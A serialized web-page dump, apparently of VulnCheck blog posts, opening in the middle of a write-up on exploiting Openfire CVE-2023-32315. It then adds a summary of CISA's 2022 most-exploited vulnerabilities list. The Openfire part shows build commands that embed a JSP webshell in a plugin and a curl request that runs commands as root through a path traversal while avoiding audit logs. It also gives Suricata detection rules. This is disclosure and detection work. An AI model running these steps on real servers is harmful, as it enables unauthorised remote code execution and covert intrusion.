line",[1373,91442,4680],{"class":1383},[1373,91444,91445],{"class":1375,"line":4768},[1373,91446,4795],{"class":1383},[1373,91448,91449,91451],{"class":1375,"line":4792},[1373,91450,28575],{"class":1383},[1373,91452,91453],{"class":1397}," %>\n",[18,91455,91456],{},"The real challenge was figuring out how to compile the thing (it probably should have been obvious, and we think we even came to a wrong conclusion… but it works). Our process roughly worked out to:",[1354,91458,91460],{"className":31740,"code":91459,"language":2186,"meta":219,"style":219},"git clone https:\u002F\u002Fgithub.com\u002Figniterealtime\u002Fopenfire-exampleplugin.git\ncd openfire-exampleplugin\ncp ..\u002Fwebshell.jsp .\u002Fsrc\u002Fmain\u002Fweb\u002Fexampleplugin-page.jsp\nmvn -B package\ncp .\u002Ftarget\u002Fexampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip .\u002Fplugin.xml .\u002Freadme.html; mv exampleplugin.zip .\u002Ftarget\u002Fexampleplugin.jar;\n",[886,91461,91462,91473,91480,91491,91502],{"__ignoreMap":219},[1373,91463,91464,91467,91470],{"class":1375,"line":1376},[1373,91465,91466],{"class":2206},"git",[1373,91468,91469],{"class":1391}," clone",[1373,91471,91472],{"class":1391}," https:\u002F\u002Fgithub.com\u002Figniterealtime\u002Fopenfire-exampleplugin.git\n",[1373,91474,91475,91477],{"class":1375,"line":220},[1373,91476,21460],{"class":1379},[1373,91478,91479],{"class":1391}," openfire-exampleplugin\n",[1373,91481,91482,91485,91488],{"class":1375,"line":1266},[1373,91483,91484],{"class":2206},"cp",[1373,91486,91487],{"class":1391}," ..\u002Fwebshell.jsp",[1373,91489,91490],{"class":1391}," .\u002Fsrc\u002Fmain\u002Fweb\u002Fexampleplugin-page.jsp\n",[1373,91492,91493,91496,91499],{"class":1375,"line":1852},[1373,91494,91495],{"class":2206},"mvn",[1373,91497,91498],{"class":2209}," -B",[1373,91500,91501],{"class":1391}," 
package\n",[1373,91503,91504,91506,91509,91512,91514,91517,91520,91522,91525,91528,91530,91533,91535,91537],{"class":1375,"line":4692},[1373,91505,91484],{"class":2206},[1373,91507,91508],{"class":1391}," .\u002Ftarget\u002Fexampleplugin.jar",[1373,91510,91511],{"class":1391}," exampleplugin.zip",[1373,91513,39663],{"class":1383},[1373,91515,91516],{"class":2206}," zip",[1373,91518,91519],{"class":2209}," -ur",[1373,91521,91511],{"class":1391},[1373,91523,91524],{"class":1391}," .\u002Fplugin.xml",[1373,91526,91527],{"class":1391}," .\u002Freadme.html",[1373,91529,39663],{"class":1383},[1373,91531,91532],{"class":2206}," mv",[1373,91534,91511],{"class":1391},[1373,91536,91508],{"class":1391},[1373,91538,4912],{"class":1383},[18,91540,91541,91544],{},[886,91542,91543],{},".\u002Ftarget\u002Fexampleplugin.jar"," is then ready to be uploaded. It’s important to know that the plugin does not keep the webshell in its raw form. The webshell gets compiled into a class. So if you want to go hunting for the webshell, you have to dig much deeper than normal.",[18,91546,91547],{},[68,91548],{":width":10862,"alt":91549,"src":91550},"Openfire plugin compiled webshell in jd-gui","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fcompiled-webshell.png",[18,91552,91553],{},"Once uploaded, the plugin looks exactly like the example plugin would. The only difference is that it has our webshell in it.",[18,91555,91556],{},[68,91557],{":width":10862,"alt":91558,"src":91559},"Openfire webshell plugin uploaded","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fplugin-uploaded.png",[18,91561,91562],{},"As previously mentioned, the attacker is free to use the webshell without authentication by using the traversal. 
However, using the traversal causes an exception and a stack trace to be dumped to standard out, preventing the webshell from presenting any content via the HTTP response body.",[18,91564,91565],{},"Looking back at our webshell, you can see that we send all command output to an HTTP header. Which means even though accessing the webshell via the path traversal generates a huge error message, we can still execute and view arbitrary commands:",[1354,91567,91569],{"className":31740,"code":91568,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -v \"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id\"\n*   Trying 10.9.49.143:9090...\n* TCP_NODELAY set\n* Connected to 10.9.49.143 (10.9.49.143) port 9090 (#0)\n> GET \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id HTTP\u002F1.1\n> Host: 10.9.49.143:9090\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Fri, 18 Aug 2023 17:20:01 GMT\n\u003C X-Frame-Options: SAMEORIGIN\n\u003C Content-Type: text\u002Fhtml\n\u003C Set-Cookie: JSESSIONID=node07guewb33cw4m1va20g1n0okxd6.node0; Path=\u002F; HttpOnly\n\u003C Expires: Thu, 01 Jan 1970 00:00:00 GMT\n\u003C X-Error: uid=0(root) gid=0(root) groups=0(root)\n\u003C Content-Length: 
6335\n\u003C\n",[886,91570,91571,91586,91593,91599,91612,91623,91630,91636,91648,91652,91658,91664,91671,91677,91683,91706,91712,91753,91760],{"__ignoreMap":219},[1373,91572,91573,91575,91577,91579,91581,91584],{"class":1375,"line":1376},[1373,91574,55482],{"class":2206},[1373,91576,2222],{"class":1391},[1373,91578,45584],{"class":2209},[1373,91580,4883],{"class":1387},[1373,91582,91583],{"class":1391},"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id",[1373,91585,19057],{"class":1387},[1373,91587,91588,91590],{"class":1375,"line":220},[1373,91589,35613],{"class":1397},[1373,91591,91592],{"class":4640},"   Trying 10.9.49.143:9090...\n",[1373,91594,91595,91597],{"class":1375,"line":1266},[1373,91596,35613],{"class":1397},[1373,91598,76077],{"class":4640},[1373,91600,91601,91603,91606,91609],{"class":1375,"line":1852},[1373,91602,35613],{"class":1397},[1373,91604,91605],{"class":4640}," Connected to 10.9.49.143 (",[1373,91607,91608],{"class":2206},"10.9.49.143",[1373,91610,91611],{"class":4640},") port 9090 (#0)\n",[1373,91613,91614,91616,91618,91621],{"class":1375,"line":4692},[1373,91615,5384],{"class":1397},[1373,91617,76097],{"class":2206},[1373,91619,91620],{"class":1391}," \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id",[1373,91622,35589],{"class":1391},[1373,91624,91625,91627],{"class":1375,"line":4724},[1373,91626,5384],{"class":1397},[1373,91628,91629],{"class":4640}," Host: 
10.9.49.143:9090\n",[1373,91631,91632,91634],{"class":1375,"line":4756},[1373,91633,5384],{"class":1397},[1373,91635,35603],{"class":4640},[1373,91637,91638,91640,91642,91644,91646],{"class":1375,"line":4768},[1373,91639,5384],{"class":1397},[1373,91641,35610],{"class":4640},[1373,91643,35613],{"class":1397},[1373,91645,2180],{"class":4640},[1373,91647,35618],{"class":1397},[1373,91649,91650],{"class":1375,"line":4792},[1373,91651,6765],{"class":1397},[1373,91653,91654,91656],{"class":1375,"line":4798},[1373,91655,35613],{"class":1397},[1373,91657,76148],{"class":4640},[1373,91659,91660,91662],{"class":1375,"line":4806},[1373,91661,11852],{"class":1397},[1373,91663,89055],{"class":4640},[1373,91665,91666,91668],{"class":1375,"line":4817},[1373,91667,11852],{"class":1397},[1373,91669,91670],{"class":4640}," Date: Fri, 18 Aug 2023 17:20:01 GMT\n",[1373,91672,91673,91675],{"class":1375,"line":4825},[1373,91674,11852],{"class":1397},[1373,91676,76200],{"class":4640},[1373,91678,91679,91681],{"class":1375,"line":4835},[1373,91680,11852],{"class":1397},[1373,91682,89097],{"class":4640},[1373,91684,91685,91687,91689,91691,91694,91696,91698,91700,91702,91704],{"class":1375,"line":4843},[1373,91686,11852],{"class":1397},[1373,91688,76228],{"class":4640},[1373,91690,5417],{"class":1397},[1373,91692,91693],{"class":1391},"node07guewb33cw4m1va20g1n0okxd6.node0",[1373,91695,39663],{"class":1383},[1373,91697,76238],{"class":4640},[1373,91699,5417],{"class":1397},[1373,91701,2180],{"class":1391},[1373,91703,39663],{"class":1383},[1373,91705,76247],{"class":2206},[1373,91707,91708,91710],{"class":1375,"line":4849},[1373,91709,11852],{"class":1397},[1373,91711,76169],{"class":4640},[1373,91713,91714,91716,91719,91721,91723,91725,91727,91729,91731,91733,91735,91737,91739,91741,91743,91745,91747,91749,91751],{"class":1375,"line":4877},[1373,91715,11852],{"class":1397},[1373,91717,91718],{"class":4640}," X-Error: 
uid",[1373,91720,5417],{"class":1397},[1373,91722,445],{"class":1391},[1373,91724,1384],{"class":1383},[1373,91726,48771],{"class":2206},[1373,91728,2230],{"class":1383},[1373,91730,75941],{"class":4640},[1373,91732,5417],{"class":1397},[1373,91734,445],{"class":1391},[1373,91736,1384],{"class":1383},[1373,91738,48771],{"class":2206},[1373,91740,2230],{"class":1383},[1373,91742,75954],{"class":4640},[1373,91744,5417],{"class":1397},[1373,91746,445],{"class":1391},[1373,91748,1384],{"class":1383},[1373,91750,48771],{"class":2206},[1373,91752,11875],{"class":1383},[1373,91754,91755,91757],{"class":1375,"line":4915},[1373,91756,11852],{"class":1397},[1373,91758,91759],{"class":4640}," Content-Length: 6335\n",[1373,91761,91762],{"class":1375,"line":4931},[1373,91763,35662],{"class":1397},[18,91765,91766],{},"From there you can trivially pivot inward, remove the webshell, and hide within the system. All without creating the administrative user and making a mess in the log files.",[61,91768,91769],{"id":35964},"Detections",[18,91771,91772],{},"Any good attacker should know how to detect as well. VulnCheck is particularly interested in network-based detections. Detecting this attack on the wire isn’t too complicated, but there is some nuance.",[18,91774,91775,91776,91779],{},"Suricata correctly normalizes the ",[886,91777,91778],{},"%u002e%u002e\u002F"," as a path traversal. 
That sounds great, and naively a rule like the following can be crafted to detect all of the public exploits we’ve seen thus far:",[1354,91781,91784],{"className":91782,"code":91783,"language":1359},[1357],"alert http any any -> any any ( \\\n  msg:\"VULNCHECK Openfire CVE-2023-32315 Exploit Attempt\"; \\\n  flow:established,to_server; \\\n  http.uri.raw; content:\"\u002Fsetup\u002Fsetup-s\u002F\"; startswith; \\\n  http.uri; content:!\"\u002Fsetup\u002Fsetup-s\u002F\"; startswith; \\\n  reference:cve,CVE-2023-32315; \\\n  classtype:web-application-attack; \\\n  sid:12701381; rev:1;)\n",[886,91785,91783],{"__ignoreMap":219},[18,91787,91788,91789,91792,91793,91796],{},"The problem is that it’s really easy to bypass. For example, if the attacker just started the URI with ",[886,91790,91791],{},"\u002F.\u002F"," then it will break the rule. Or ",[886,91794,91795],{},"\u002Fsetup\u002F.\u002Fsetup-s\u002F",". Plenty of little tricks like that. So this “good enough” rule should really be augmented with additional rules just in case someone wants to get clever:",[1354,91798,91801],{"className":91799,"code":91800,"language":1359},[1357],"alert http any any -> any any ( \\\n  msg:\"VULNCHECK Openfire CVE-2023-32315 Exploit Attempt (Account)\"; \\\n  flow:established,to_server; \\\n  http.uri.raw; content:\"setup\"; \\\n  content:\"setup-s\"; distance: 1; \\\n  content:\"%u002e\"; distance: 1; \\\n  content:\"user-create.jsp\"; distance: 1; \\\n  reference:cve,CVE-2023-32315; \\\n  classtype:web-application-attack; \\\n  sid:12701382; rev:1;)\n",[886,91802,91800],{"__ignoreMap":219},[1354,91804,91807],{"className":91805,"code":91806,"language":1359},[1357],"alert http any any -> any any ( \\\n  msg:\"VULNCHECK Openfire CVE-2023-32315 Exploit Attempt (Plugin)\"; \\\n  flow:established,to_server; \\\n  http.uri.raw; content:\"setup\"; \\\n  content:\"setup-s\"; distance: 1; \\\n  content:\"%u002e\"; distance: 1; \\\n  content:\"plugin-admin.jsp\"; distance: 1; \\\n  
reference:cve,CVE-2023-32315; \\\n  classtype:web-application-attack; \\\n  sid:12701383; rev:1;)\n",[886,91808,91806],{"__ignoreMap":219},[18,91810,91811],{},"Detection after exploitation is much more challenging since the attack, if done correctly, can entirely avoid the security audit log. The next best source of truth is any new\u002Funexpected plugins on the system. Generally, however, someone will need to look at that with a Java decompiler, which isn’t useful for a layperson.",[18,91813,91814,91815,91818],{},"The final source to examine is probably the ",[886,91816,91817],{},"openfire.log"," file (which might get deleted). The telltale indication of exploitation in the log file will be long stack traces associated with:",[1925,91820,91821],{},[18,91822,91823],{},"\"org.jivesoftware.openfire.user.User.getUsername()\" because the return value of \"org.jivesoftware.util.WebManager.getUser()\" is null",[61,91825,88770],{"id":88769},[18,91827,91828,91829,91831],{},"In this blog, we demonstrated a new way to exploit CVE-2023-32315. This method avoids creating an admin user and bypasses some important security logging. Given that, we identified potential areas to identify compromise (JAR file, ",[886,91830,91817],{},") and provided a general outline of what indicators to look for.",[18,91833,91834],{},"This vulnerability has already been exploited in the wild, likely even by a well-known botnet. 
With plenty of vulnerable internet-facing systems, we assume exploitation will continue into the future.",[61,91836,13102],{"id":13101},[18,91838,91839],{},"If you are as interested in exploits as we are, register for a VulnCheck account today by clicking “Sign in \u002F Join Community” and schedule a demo to learn more.",[2901,91841,91842],{},"",{"title":219,"searchDepth":220,"depth":220,"links":91844},[91845,91846,91847,91848,91849,91850],{"id":11647,"depth":220,"text":11648},{"id":88414,"depth":220,"text":88415},{"id":90093,"depth":220,"text":90094},{"id":35964,"depth":220,"text":91769},{"id":88769,"depth":220,"text":88770},{"id":13101,"depth":220,"text":13102},"CVE-2023-32315 was first exploited in the wild in June 2023. However, VulnCheck has discovered a new approach to exploiting this vulnerability, streamlining the attack process and adeptly bypassing the generation of log entries. In addition, VulnCheck analyzes the remaining indicators of compromise and shares network detections.",{"slug":91853},"openfire-cve-2023-32315","\u002Fblog\u002Fopenfire-cve-2023-32315",{"title":83439,"description":91851},"blog\u002Fopenfire-cve-2023-32315",[242],"lcnEOwijSFnMO-s-jI5MkiseKX9cQ5Dwgi6HypC8Zm8",{"id":91860,"title":91861,"articles":91862,"authors":91867,"body":91869,"date":91866,"description":92117,"extension":234,"image":7,"link":7,"meta":92118,"navigation":237,"path":92123,"seo":92124,"series":7,"stem":92125,"subtype":7,"tags":92126,"__hash__":92127},"blog\u002Fblog\u002F2022-top-exploited.md","Insight into the 2022 Top Routinely Exploited Vulnerabilities VulnCheck",[91863],{"title":91864,"source":39566,"link":91865,"date":91866},"Cyberespionage on many fronts. Advanced spearphishing, CPU vulnerabilities. Ransomware and other threat trends. 
Patch Tuesday.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F151","2023-08-09",[91868],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":91870,"toc":92106},[91871,91880,91883,91885,91893,91896,91899,91904,91908,91915,91923,91942,91945,91948,91951,91996,92001,92005,92008,92029,92036,92041,92045,92048,92051,92054,92059,92063,92067,92076,92096,92098,92101,92103],[18,91872,91873,91874,91879],{},"CISA, along with a cohort of cybersecurity agencies, published the ",[47,91875,91878],{"href":91876,"rel":91877},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa23-215a",[51],"2022 Top Routinely Exploited Vulnerabilities"," on August 3, 2023. The advisory contains two lists of vulnerabilities. The first, what we’ll focus on, is the twelve most exploited vulnerabilities in 2022. Additionally, they added thirty more vulnerabilities that were “routinely” exploited.",[18,91881,91882],{},"Unfortunately, these lists lack a lot of context, which can be useful for remediation, prioritization, and detection. Details like: are there public exploits? Are the issues being used by ransomware? Threat actors? DDOS botnets? In this blog, we’ll dig deeper into the top twelve CVEs and provide some much-needed context.",[61,91884,60799],{"id":61495},[18,91886,91887,91888,59],{},"Perhaps unsurprisingly, the twelve most exploited vulnerabilities are very well-known. Most were well-known before we even got to the year 2022, with the earliest dating back to 2018. Seven of the vulnerabilities were included in CISA’s ",[47,91889,91892],{"href":91890,"rel":91891},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa22-117a",[51],"2021 Top Routinely Exploited Vulnerabilities",[18,91894,91895],{},"Given all the effort poured into awareness, detection, and remediation, how is it that the same vulnerabilities are repeated year to year? 
CISA does not discuss their methodology, nor do they clarify what they mean by exploited: exploit attempt or successful exploitation? If it’s the former, this is a “good to know” list that isn’t too concerning. If it’s the latter, the security industry has failed to protect its customers from obvious and widely known threats for two years in a row.",[18,91897,91898],{},"Nothing about these vulnerabilities is a secret. The issues are particularly well-known to the exploit development community.",[1925,91900,91901],{},[18,91902,91903],{},"Where to Find Exploits for the Top 12 Exploited CVE",[11128,91905],{":labels":91906,":values":91907},"[\"Metasploit\",\"GitHub, GitLab, Gitee\",\"Nuclei\",\"Commercial\"]","[12,12,8,9]",[18,91909,91910,91911,59],{},"All twelve have available exploits. All twelve have weaponized exploits in Metasploit, as well as various one-off implementations across ",[47,91912,91914],{"href":72091,"rel":91913},[51],"GitHub, GitLab, Gitee, etc",[18,91916,91917,91918,91922],{},"Eight of the twelve have ",[47,91919,22175],{"href":91920,"rel":91921},"https:\u002F\u002Fnuclei.projectdiscovery.io\u002Fnuclei\u002Fget-started\u002F",[51]," templates. Nuclei has made scanning the internet for known vulnerabilities easy, so it’s useful to know which vulnerabilities the Nuclei community has created templates for.",[18,91924,91925,91926,1246,91931,91936,91937,91941],{},"To our knowledge, nine of the vulnerabilities have commercially available exploits. Commercial exploits are typically more customized, highly weaponized, and developed for valuable targets in real-world situations. 
The fact that exploits were added to commercial exploit products like ",[47,91927,91930],{"href":91928,"rel":91929},"https:\u002F\u002Fwww.coresecurity.com\u002Fcore-labs\u002Fexploits",[51],"Core",[47,91932,91935],{"href":91933,"rel":91934},"https:\u002F\u002Fimmunityinc.com\u002Fproducts\u002Fcanvas\u002F",[51],"CANVAS",", and VulnCheck’s ",[47,91938,91940],{"href":45535,"rel":91939},[51],"Initial Access"," indicates these targets weren’t just prevalent in the wild, but also provided valuable access.",[61,91943,91944],{"id":22200},"Attackers",[18,91946,91947],{},"The top twelve vulnerabilities are associated with a slew of attackers. All twelve have been exploited by threat actors, ten are associated with ransomware, and nine are associated with botnets.",[993,91949,331],{"id":91950},"ransomware",[18,91952,91953,91954,1246,91959,1255,91964,91968,91969,4641,91974,1246,91979,1255,91984,91989,91990,91995],{},"Our data shows the vulnerabilities are used by more than 30 different ransomware groups, including ",[47,91955,91958],{"href":91956,"rel":91957},"https:\u002F\u002Fwww.ic3.gov\u002FMedia\u002FNews\u002F2022\u002F220318.pdf",[51],"AvosLocker",[47,91960,91963],{"href":91961,"rel":91962},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa23-165a",[51],"Lockbit",[47,91965,32702],{"href":91966,"rel":91967},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002F202103231400_Analyst_Note_CL0P_TLP_WHITE.pdf",[51],". 
The most popular CVEs were the ",[47,91970,91973],{"href":91971,"rel":91972},"https:\u002F\u002Fwww.mandiant.com\u002Fresources\u002Fblog\u002Fpst-want-shell-proxyshell-exploiting-microsoft-exchange-servers",[51],"ProxyShell chain",[47,91975,91978],{"href":91976,"rel":91977},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2021-34473",[51],"CVE-2021-34473",[47,91980,91983],{"href":91981,"rel":91982},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-34523",[51],"CVE-2021-34523",[47,91985,91988],{"href":91986,"rel":91987},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-31207",[51],"CVE-2021-31207",") which was widely used against Exchange servers when it popped onto the scene in 2021. The next most popular was ",[47,91991,91994],{"href":91992,"rel":91993},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-26084",[51],"CVE-2021-26084",", which is an easy to exploit issue in Confluence that was initially exploited in the wild as a zero day.",[1925,91997,91998],{},[18,91999,92000],{},"Top 12 Exploited CVE Most Used by Ransomware Groups (Groups per CVE)",[11128,92002],{":labels":92003,":values":92004},"[\"CVE-2021-34473\",\"CVE-2021-34523\",\"CVE-2021-31207\",\"CVE-2021-26084\",\"CVE-2018-13379\",\"CVE-2021-44228\"]","[13,13,13,9,6,6]",[993,92006,328],{"id":92007},"threat-actors",[18,92009,92010,92011,92016,92017,92022,92023,92028],{},"The vulnerabilities have been exploited by more than 60 different groups. 
The most popular “group” in our ranking is “Unattributed” (twelve vulnerabilities out of twelve), followed by the generic “Chinese-nexus” (six out of twelve), before getting into more well-known groups like ",[47,92012,92015],{"href":92013,"rel":92014},"https:\u002F\u002Fthehackernews.com\u002F2022\u002F09\u002Fsparklinggoblin-apt-hackers-using-new.html",[51],"SparklingGoblin"," (five out of twelve), ",[47,92018,92021],{"href":92019,"rel":92020},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fcharming_kitten",[51],"Charming Kitten"," (five out of twelve), and ",[47,92024,92027],{"href":92025,"rel":92026},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fdev-0270",[51],"Nemesis Kitten"," (four out of twelve).",[18,92030,92031,92032,92035],{},"Threat actors have a reputation of using advanced techniques and zero-day vulnerabilities, but many are opportunistic attackers as well. 22 threat actors are known to have exploited ",[47,92033,61923],{"href":83629,"rel":92034},[51]," (Log4Shell), and 18 reportedly used the ProxyShell chain.",[1925,92037,92038],{},[18,92039,92040],{},"Top 12 Exploited CVE Most Used by Threat Actors (Actors per CVE)",[11128,92042],{":labels":92043,":values":92044},"[\"CVE-2021-44228\",\"CVE-2021-34473\",\"CVE-2022-30190\",\"CVE-2021-31207\",\"CVE-2021-34523\",\"CVE-2018-13379\",\"CVE-2022-26134\",\"CVE-2022-22954\"]","[22,18,17,16,16,9,6,6]",[993,92046,44260],{"id":92047},"botnets",[18,92049,92050],{},"Surprisingly, we see much less botnet activity compared to the other two categories. Botnets, of course, are well known for throwing exploits all around the internet. Their volume of exploitation should be higher than, for example, a more targeted threat actor group. Nonetheless, our data indicates that nine of the twelve vulnerabilities are associated with botnets. 
The most popular, of course, is Mirai (four out of twelve), followed by ProxyShellMiner (three out of twelve), Kinsing, Muhstik, BillGates, and Enemybot (all two out of twelve).",[18,92052,92053],{},"Once again, Log4Shell is the most commonly used vulnerability by the botnets we track.",[1925,92055,92056],{},[18,92057,92058],{},"Top 12 Exploited CVE Most Used by Botnets (Botnets per CVE)",[11128,92060],{":labels":92061,":values":92062},"[\"CVE-2021-44228\",\"CVE-2022-26134\",\"CVE-2021-26084\",\"CVE-2022-1388\",\"CVE-2022-22954\"]","[7,4,3,2,2]",[61,92064,92066],{"id":92065},"current-activity-and-detections","Current Activity and Detections",[18,92068,92069,92070,92075],{},"These vulnerabilities didn’t drop off the map just because we flipped the calendar to 2023. GreyNoise provides tags for 10 of these vulnerabilities, and all but one showed active exploitation attempts in the last three days (the one “dead” tag was ",[47,92071,92074],{"href":92072,"rel":92073},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-1388",[51],"CVE-2022-1388"," - an F5 Auth bypass).",[18,92077,92078,92079,8659,92084,92089,92090,92095],{},"Given that these issues are still actively exploited, it’s not too late to start adding exploit and vulnerability detection to your network. Detections for these issues are widely available through a litany of products. 
We don’t play favorites, but we will share three “free” solutions:\nA combination of the ",[47,92080,92083],{"href":92081,"rel":92082},"https:\u002F\u002Frules.emergingthreats.net\u002F",[51],"Proofpoint Emerging Threats Rules",[47,92085,92088],{"href":92086,"rel":92087},"https:\u002F\u002Fwww.snort.org\u002Ffaq\u002Fwhat-are-community-rules",[51],"Snort Community Ruleset"," will give you network signature coverage for ten out of twelve of these issues.\n",[47,92091,92094],{"href":92092,"rel":92093},"https:\u002F\u002Fwww.tenable.com\u002Fproducts\u002Fnessus\u002Fnessus-essentials",[51],"Nessus Free"," covers all twelve via their plugin system. Although, free is limited to a very small number of IP addresses, so it’s likely not a long-term solution.",[61,92097,1903],{"id":1902},[18,92099,92100],{},"The 2022 Top Routinely Exploited Vulnerabilities contains no surprises. All of the top twelve are well known to exploit developers, attackers, and detection engineers. However, it’s good to remember that these vulnerabilities are not yet behind us. Attackers continue to pursue vulnerable targets, particularly older vulnerabilities, that organizations have yet to patch despite available security updates to remediate the flaws. The weaponization of these exploits will carry on until it is no longer worth the effort, underscoring the need for defensive teams to prioritize and remediate the vulnerabilities that matter most. Defenders must continue to minimize their attack surface, monitor their assets, and watch for attacks on the wire.",[61,92102,202],{"id":201},[18,92104,92105],{},"Did you find our exploit and attacker information interesting? 
If so, register for a VulnCheck account today by clicking “Sign in \u002F Join Community” and schedule a demo.",{"title":219,"searchDepth":220,"depth":220,"links":92107},[92108,92109,92114,92115,92116],{"id":61495,"depth":220,"text":60799},{"id":22200,"depth":220,"text":91944,"children":92110},[92111,92112,92113],{"id":91950,"depth":1266,"text":331},{"id":92007,"depth":1266,"text":328},{"id":92047,"depth":1266,"text":44260},{"id":92065,"depth":220,"text":92066},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck provides additional insight into CISA's 2022 Top Routinely Exploited Vulnerabilities by looking at the availability of exploits and examining which threat actors, botnets, and ransomware crews used the vulnerabilities.",{"slug":92119,"sitemap":92120},"2022-top-exploited",{"videos":92121,"images":92122},[],[],"\u002Fblog\u002F2022-top-exploited",{"title":91861,"description":92117},"blog\u002F2022-top-exploited",[1279],"GKp013y3o6tZ9RPYh5HDb-mcN7uj_5xFBSU79_945sw",{"id":92129,"title":83451,"articles":92130,"authors":92199,"body":92201,"date":92134,"description":93261,"extension":234,"image":7,"link":7,"meta":93262,"navigation":237,"path":93264,"seo":93265,"series":7,"stem":93266,"subtype":7,"tags":93267,"__hash__":93268},"blog\u002Fblog\u002Fmikrotik-foisted-revisited.md",[92131,92135,92139,92143,92146,92149,92152,92155,92159,92162,92165,92168,92171,92176,92180,92184,92188,92191,92195],{"title":92132,"source":11218,"link":92133,"date":92134},"Patch Now: Up to 900K MikroTik Routers Vulnerable to Total Takeover","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fup-to-900k-mikrotik-routers-vulnerable-total-takeover","2023-07-25",{"title":92136,"source":73072,"link":92137,"date":92138},"Cyber Security Headlines: TETRA encryption flaws, Zenbleed strikes, Norway’s government hit with Ivanti 
flaw","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-tetra-encryption-flaws-zenbleed-strikes-norways-government-hit-with-ivanti-flaw\u002F","2023-07-26",{"title":92140,"source":92141,"link":92142,"date":92138},"MikroTik OS bug exposes over 500,000 devices","CyberNews","https:\u002F\u002Fcybernews.com\u002Fnews\u002Fmikrotik-bug-exposes-thousands-devices\u002F",{"title":92144,"source":84069,"link":92145,"date":92138},"MikroTik vulnerability could be used to hijack 900,000 routers (CVE-2023-30799)","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F07\u002F26\u002Fcve-2023-30799\u002F",{"title":92147,"source":57680,"link":92148,"date":92138},"Over 900,000 MikroTik Routers Exposed to Critical Bug","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002F900000-mikrotik-routers-critical\u002F",{"title":92150,"source":3494,"link":92151,"date":92138},"Risky Biz News: Norwegian government hacked with MobileIron zero-day","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-norwegian-government?utm_source=post-email-title&publication_id=852612&post_id=135448192&isFreemail=true&utm_medium=email",{"title":92153,"source":11233,"link":92154,"date":92138},"Over 900K MikroTik routers vulnerable to critical bug","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fover-900k-mikrotik-routers-vulnerable-to-critical-bug",{"title":92156,"source":92157,"link":92158,"date":92138},"FLIPPER ZEROES, THE “KIA BOYS”, RFID TAGS FOR AMAZON, & PCI WIZARDRY – PSW #792","SC Media: Paul’s Security Weekly Podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Fflipper-zeroes-the-kia-boys-rfid-tags-for-amazon-pci-wizardry-psw-792",{"title":92160,"source":14390,"link":92161,"date":92138},"Over 500K MikroTik RouterOS systems potentially exposed to hacking due to critical 
flaw","https:\u002F\u002Fsecurityaffairs.com\u002F148811\u002Fhacking\u002Fmikrotik-routeros-critical-flaw.html",{"title":92163,"source":14378,"link":92164,"date":92138},"Code Execution Vulnerability Impacts 900k MikroTik Devices","https:\u002F\u002Fwww.securityweek.com\u002Fcode-execution-vulnerability-impacts-900k-mikrotik-devices\u002F",{"title":92166,"source":14382,"link":92167,"date":92138},"Critical MikroTik RouterOS Vulnerability Exposes Over Half a Million Devices to Hacking","https:\u002F\u002Fthehackernews.com\u002F2023\u002F07\u002Fcritical-mikrotik-routeros.html",{"title":92169,"source":65365,"link":92170,"date":92138},"Researchers say more than 900,000 MikroTik routers vulnerable to hackers","https:\u002F\u002Ftherecord.media\u002Fmore-than-900000-mikrotik-routers-vulnerable-to-new-bug",{"title":92172,"source":92173,"link":92174,"date":92175},"Critical Privilege Escalation Flaw Risks 900K+ MikroTik Routers","The Latest Hacking News","https:\u002F\u002Flatesthackingnews.com\u002F2023\u002F07\u002F27\u002Fcritical-privilege-escalation-flaw-risks-900k-mikrotik-routers\u002F","2023-07-27",{"title":92177,"source":89966,"link":92178,"date":92179},"July 28, 2023 – At least 8 million Americans hit in the latest MOVEit hack, and 